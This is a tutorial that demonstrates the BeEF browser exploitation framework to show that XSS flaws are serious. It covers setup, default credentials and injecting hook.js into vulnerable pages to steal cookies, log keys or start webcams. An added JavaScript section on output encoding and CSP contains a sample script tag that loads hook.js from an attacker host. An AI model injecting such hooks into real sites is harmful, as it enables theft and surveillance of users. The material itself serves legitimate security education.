Detect and correct XSS flaws with Beef


Most developers, when you show them an XSS flaw with a JavaScript pop-up saying "hack" or "hello", are not impressed ... they answer that JavaScript is secure and that it only runs on the client side.
Since I don't have time to write the JavaScript myself to show you that an XSS flaw is dangerous, I will demonstrate it with the BeEF tool, a browser exploitation framework coded in PHP & JavaScript.

BeEF is a powerful professional security tool. Unlike most other security tools, BeEF focuses on exploiting vulnerabilities on the browser (client) side to assess the security level of a target. Thanks to BeEF and its XSS attack vector, it is possible to turn a victim's browser into a zombie.

What can we do with beef?

  • Information retrieval
  • Theft of cookies (obviously)
  • Keylogger
  • List of sites / domains visited
  • Browser fingerprint (OS, plugins, etc.)
  • Webcam!

Architecture Beef

When a user runs BeEF, two components are started: the user interface and the Communication Server (CS). These two elements are the basic building blocks of BeEF.

User interface
This is the interface for controlling BeEF. From there, a user can see which victims are online and offline, run exploits against them, and see the results.

Communications Server
The Communication Server (CS) is the component that communicates via HTTP with infected browsers.

Installation

BeEF is available on Linux with the Kali Linux distribution. If you have a Windows computer, I advise you, before going further, to install a Linux distribution (like Kali Linux) in a virtual machine: just download VMware and a Kali Linux image. BeEF is already pre-installed on it. Here is how to install Kali Linux on a Windows machine with VMware.

However, you can also install BeEF on Windows; for that see: http://code.google.com/p/beef/wiki/WindowsInstall
To install it on another Linux distribution or on OS X, see: http://code.google.com/p/beef/wiki/Install

How to use Beef?

To start, launch the BeEF server in BackTrack. To do this, go to the menu:
Application -> backtrack -> Application -> Exploitation tools -> Social Engineering Tools -> Beef XSS Framework -> Beef


The server starts within a few seconds, and you then get a window listing the URLs used for the web interface as well as the URL of the script that you must inject into vulnerable pages.


As you can see in the example above, there are several network interfaces. You can now access the administration interface (web interface) using these URLs.
In my case, the administration interface is http://192.168.230.128:3000/ui/panel and the script to inject is http://192.168.230.128:3000/hook.js
When you open the administration page, you get a login page. Log in to the BeEF server using the default credentials (beef / beef).


Once connected, you will have a page divided into 4 parts:


  • Zombies section: this is where your connected victims are listed.
  • Commands section: this section contains a number of commands that can be executed on the target, each with a colored indicator of its relative safety. This is the most powerful part of the BeEF framework.
  • Results section: the results of the executed commands are listed here.
  • Description section: here you get the description of each command.

It now remains to inject hook.js into a vulnerable forum, or simply into any web application that contains an XSS flaw.
However, you can test BeEF locally using the BeEF demo page: http://127.0.0.1:3000/demos/basic.html


Once the browser is hooked, you should see a target added on the left of the administration panel.
Finally, select this browser to display information about the target; you can then launch commands to list the last sites visited, to place a keylogger, or to start the target's camera.

How to protect yourself?

  • Updating browsers and plugins is the first rule!
  • Install a firewall on your machine.
  • Install an anti-XSS extension in your browser such as "NoScript". It only allows JavaScript to run on the trusted domains of your choice, and it prevents the exploitation of XSS or CSRF vulnerabilities without loss of functionality.
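The advice above is for the user side; on the application side the fix is output encoding plus a Content-Security-Policy. The following is an added example (not code from the article or from the BeEF project) showing a vulnerable comment renderer next to its hardened form, and a crude check for an injected external script tag. The function names and the CSP value are my own assumptions; the hostile comment is constructed from the hook.js URL used in this article.

```javascript
// Added example, not part of the original article or of BeEF.
// Assumed helper names: renderCommentUnsafe, renderCommentSafe, htmlEscape,
// cspHeader, containsExternalScript.

// Constructed sample input: the kind of text posted into a vulnerable forum
// field. The host/port are the ones from the article's lab setup.
const HOSTILE_COMMENT = '<script src="http://192.168.230.128:3000/hook.js"></script>';

// Vulnerable "before": user input is interpolated straight into the HTML,
// so a <script src> tag becomes live markup in every visitor's browser.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Contextual output encoding for the HTML body context: every character that
// can open a tag, attribute or entity is replaced by its entity form.
function htmlEscape(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(s).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Hardened "after": the same template, but the input is encoded first, so the
// browser renders the injected tag as visible text instead of executing it.
function renderCommentSafe(comment) {
  return `<div class="comment">${htmlEscape(comment)}</div>`;
}

// Defence in depth: a CSP that only allows scripts from the page's own origin.
// Even if encoding is missed somewhere, a <script src> pointing at another
// host (such as a BeEF server) is refused by a CSP-aware browser.
function cspHeader() {
  return "Content-Security-Policy: default-src 'self'; script-src 'self'; " +
         "object-src 'none'; base-uri 'none'";
}

// Crude detection check usable on rendered output or on a stored page body:
// does it contain a script tag whose src points at an external http(s) host?
function containsExternalScript(html) {
  return /<script[^>]*\bsrc\s*=\s*["']?https?:\/\//i.test(html);
}
```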

Conclusion

BeEF is an easy-to-use and very practical tool. Thanks to BeEF, advanced XSS attacks become easy to perform.
I hope I was able to convince you that the impact of an XSS vulnerability is serious, and that with a tool like BeEF a simple XSS vulnerability can be turned into a very dangerous one.
And before I forget… Consider sharing this article by clicking on the social network buttons. It will give me great pleasure! 🙂